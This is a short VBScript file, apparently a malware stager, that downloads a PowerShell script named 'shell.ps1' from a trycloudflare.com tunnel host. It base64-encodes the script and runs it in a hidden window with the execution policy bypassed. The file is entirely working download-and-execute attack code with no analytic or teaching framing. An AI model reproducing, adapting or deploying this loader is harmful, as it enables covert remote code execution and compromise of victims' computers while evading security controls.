Dim url, objHTTP, objShell, scriptContent, encodedCommand
' Define URL of the PowerShell script
url = "https://dat-voip-sit-cio.trycloudflare.com/shell.ps1"
' Create XMLHTTP object to download the file
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
objHTTP.Open "GET", url, False
objHTTP.Send
If objHTTP.Status = 200 Then
scriptContent = objHTTP.responseText
encodedCommand = Base64Encode(scriptContent)
' Execute PowerShell script in-memory
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ExecutionPolicy Bypass -EncodedCommand " & encodedCommand, 0, True
End If
' Cleanup
Set objHTTP = Nothing
Set objShell = Nothing
' Base64 Encoding Functions
Function Base64Encode(sText)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.nodeTypedValue = Stream_StringToBytes(sText)
Base64Encode = Replace(oNode.text, vbLf, "")
End Function
Function Stream_StringToBytes(sText)
Dim oStream
Set oStream = CreateObject("ADODB.Stream")
oStream.Type = 2 ' Text
oStream.Charset = "utf-16le" ' PowerShell uses UTF-16LE
oStream.Open
oStream.WriteText sText
oStream.Position = 0
oStream.Type = 1 ' Binary
oStream.Position = 2 ' Skip UTF-16LE BOM
Stream_StringToBytes = oStream.Read
oStream.Close
End Function
